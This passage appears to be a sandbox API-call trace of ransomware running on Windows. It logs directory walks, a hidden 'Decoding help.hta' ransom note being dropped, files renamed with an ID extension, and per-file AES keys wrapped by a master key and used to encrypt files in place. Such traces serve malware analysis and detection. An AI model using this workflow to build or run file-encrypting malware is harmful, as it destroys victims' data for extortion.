lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*" [0042.056] GlobalMemoryStatus (in: lpBuffer=0xe34fd10 | out: lpBuffer=0xe34fd10) [0042.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cc0458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.057] CloseHandle (hObject=0x518) returned 1 [0042.057] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xe34fd30 | out: lpFindFileData=0xe34fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1 [0042.057] lstrcmpW (lpString1=".", lpString2="Keys") returned -1 [0042.057] lstrcmpW (lpString1="..", lpString2="Keys") returned -1 [0042.057] lstrcmpiW (lpString1="windows", lpString2="Keys") returned 1 [0042.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" [0042.058] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned 39 [0042.058] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\", lpString2="Keys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys" [0042.058] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*.*" [0042.058] GlobalMemoryStatus (in: lpBuffer=0xe34fd10 | out: lpBuffer=0xe34fd10) [0042.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10790048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.058] CloseHandle (hObject=0x518) returned 1 [0042.058] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xe34fd30 | out: lpFindFileData=0xe34fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0042.058] lstrcmpW (lpString1=".", lpString2="RSA") returned -1 [0042.059] lstrcmpW (lpString1="..", lpString2="RSA") returned -1 [0042.059] lstrcmpiW (lpString1="windows", lpString2="RSA") returned 1 [0042.059] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" [0042.059] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned 39 [0042.059] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA" [0042.059] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*" [0042.059] GlobalMemoryStatus (in: lpBuffer=0xe34fd10 | out: lpBuffer=0xe34fd10) [0042.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108b0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.060] CloseHandle (hObject=0x518) returned 1 [0042.060] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xe34fd30 | out: lpFindFileData=0xe34fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0042.060] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 183 os_tid = 0x7bc [0040.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0xe48fd30 | out: lpFindFileData=0xe48fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5c30 [0040.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.388] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0xe48fd30 | out: lpFindFileData=0xe48fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.388] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.403] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.403] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0xe48fd30 | out: lpFindFileData=0xe48fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0040.403] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" [0040.403] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned 33 [0040.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta" [0040.403] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\default\\contacts\\decoding help.hta")) returned 0xffffffff [0040.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\default\\contacts\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0040.404] WriteFile (in: hFile=0x28c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xe48fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xe48fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.404] CloseHandle (hObject=0x28c) returned 1 [0040.405] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0040.405] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Administrator.contact") returned 1 [0040.405] lstrlenW (lpString="Administrator.contact") returned 21 [0040.405] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" [0040.405] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned 33 [0040.405] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\", lpString2="Administrator.contact" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" [0040.405] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" [0040.405] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]" [0040.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\contacts\\administrator.contact.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\contacts\\administrator.contact.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0040.406] CreateFileMappingA (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0040.406] CryptAcquireContextA (in: phProv=0xe48fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe48fcec*=0x3448610) returned 1 [0040.407] CryptGenKey (in: hProv=0x3448610, Algid=0x6610, dwFlags=0x1, phKey=0xe48fce8 | out: phKey=0xe48fce8*=0x5a5c70) returned 1 [0040.407] CryptExportKey (in: hKey=0x5a5c70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe48fbe4, pdwDataLen=0xe48fce4 | out: pbData=0xe48fbe4*, pdwDataLen=0xe48fce4*=0x2c) returned 1 [0040.407] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b00) returned 0xdd10000 [0040.910] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe48fbe4*, pdwDataLen=0xe48fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe48fbe4*, pdwDataLen=0xe48fcf8*=0x100) returned 1 [0041.384] CryptEncrypt (in: hKey=0x5a5c70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xdd10000, pdwDataLen=0xe48fce4*=0x10b00, dwBufLen=0x10b00 | out: pbData=0xdd10000*, pdwDataLen=0xe48fce4*=0x10b00) returned 1 [0041.386] UnmapViewOfFile (lpBaseAddress=0xdd10000) returned 1 [0041.389] CloseHandle (hObject=0x290) returned 1 [0041.389] CryptDestroyKey (hKey=0x5a5c70) returned 1 [0041.389] CryptReleaseContext (hProv=0x3448610, dwFlags=0x0) returned 1 [0041.389] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.389] WriteFile (in: hFile=0x28c, lpBuffer=0xe48fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe48fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe48fbe4*, lpNumberOfBytesWritten=0xe48fcf8*=0x100, lpOverlapped=0x0) returned 1 [0041.390] WriteFile (in: hFile=0x28c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe48fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe48fcf8*=0x500, lpOverlapped=0x0) returned 1 [0041.390] CloseHandle (hObject=0x28c) returned 1 [0041.391] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0041.391] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0xe48fd30 | out: lpFindFileData=0xe48fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.391] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" [0041.391] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned 33 [0041.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta" [0041.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\default\\contacts\\decoding help.hta")) returned 0x1 [0041.392] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.392] lstrlenW (lpString="desktop.ini") returned 11 [0041.392] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" [0041.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned 33 [0041.392] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" [0041.392] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" [0041.392] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\contacts\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\contacts\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0041.704] CreateFileMappingA (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2f8 [0041.704] CryptAcquireContextA (in: phProv=0xe48fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe48fcec*=0x3448c70) returned 1 [0044.589] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0xe48fce8 | out: phKey=0xe48fce8*=0x5a60b0) returned 1 [0044.589] CryptExportKey (in: hKey=0x5a60b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe48fbe4, pdwDataLen=0xe48fce4 | out: pbData=0xe48fbe4*, pdwDataLen=0xe48fce4*=0x2c) returned 1 [0044.589] MapViewOfFile (hFileMappingObject=0x2f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x40b0000 [0044.638] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe48fbe4*, pdwDataLen=0xe48fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe48fbe4*, pdwDataLen=0xe48fcf8*=0x100) returned 1 [0044.644] CryptEncrypt (in: hKey=0x5a60b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x40b0000*, pdwDataLen=0xe48fce4*=0x180, dwBufLen=0x180 | out: pbData=0x40b0000*, pdwDataLen=0xe48fce4*=0x180) returned 1 [0044.644] UnmapViewOfFile (lpBaseAddress=0x40b0000) returned 1 [0044.646] CloseHandle (hObject=0x2f8) returned 1 [0044.646] CryptDestroyKey (hKey=0x5a60b0) returned 1 [0044.646] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0044.646] SetFilePointerEx (in: hFile=0x28c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.646] WriteFile (in: hFile=0x28c, lpBuffer=0xe48fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe48fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe48fbe4*, lpNumberOfBytesWritten=0xe48fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.647] WriteFile (in: hFile=0x28c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe48fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe48fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.647] CloseHandle (hObject=0x28c) returned 1 [0044.648] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.649] FindNextFileW (in: hFindFile=0x5a5c30, lpFindFileData=0xe48fd30 | out: lpFindFileData=0xe48fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.649] FindClose (in: hFindFile=0x5a5c30 | out: hFindFile=0x5a5c30) returned 1 Thread: id = 184 os_tid = 0x8e8 [0040.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*", lpFindFileData=0xe5cfd30 | out: lpFindFileData=0xe5cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5cf0 [0040.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.409] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xe5cfd30 | out: lpFindFileData=0xe5cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.409] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.410] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xe5cfd30 | out: lpFindFileData=0xe5cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0040.410] lstrcmpW (lpString1=".", lpString2="logs") returned -1 [0040.410] lstrcmpW (lpString1="..", lpString2="logs") returned -1 [0040.410] lstrcmpiW (lpString1="windows", lpString2="logs") returned 1 [0040.410] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*" [0040.410] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Mozilla\\*.*") returned 34 [0040.410] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\", lpString2="logs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs" [0040.410] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*" [0040.410] GlobalMemoryStatus (in: lpBuffer=0xe5cfd10 | out: lpBuffer=0xe5cfd10) [0040.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97923d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x298 [0040.411] CloseHandle (hObject=0x298) returned 1 [0040.411] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xe5cfd30 | out: lpFindFileData=0xe5cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0040.411] FindClose (in: hFindFile=0x5a5cf0 | out: hFindFile=0x5a5cf0) returned 1 Thread: id = 185 os_tid = 0x90c [0040.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0xe70fd30 | out: lpFindFileData=0xe70fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 186 os_tid = 0x8e4 [0040.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*", lpFindFileData=0xe84fd30 | out: lpFindFileData=0xe84fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5cf0 [0040.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.413] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xe84fd30 | out: lpFindFileData=0xe84fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.413] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.413] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.413] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xe84fd30 | out: lpFindFileData=0xe84fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 1 [0040.413] lstrcmpW (lpString1=".", lpString2="v1.0") returned -1 [0040.413] lstrcmpW (lpString1="..", lpString2="v1.0") returned -1 [0040.413] lstrcmpiW (lpString1="windows", lpString2="v1.0") returned 1 [0040.413] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*" | out: 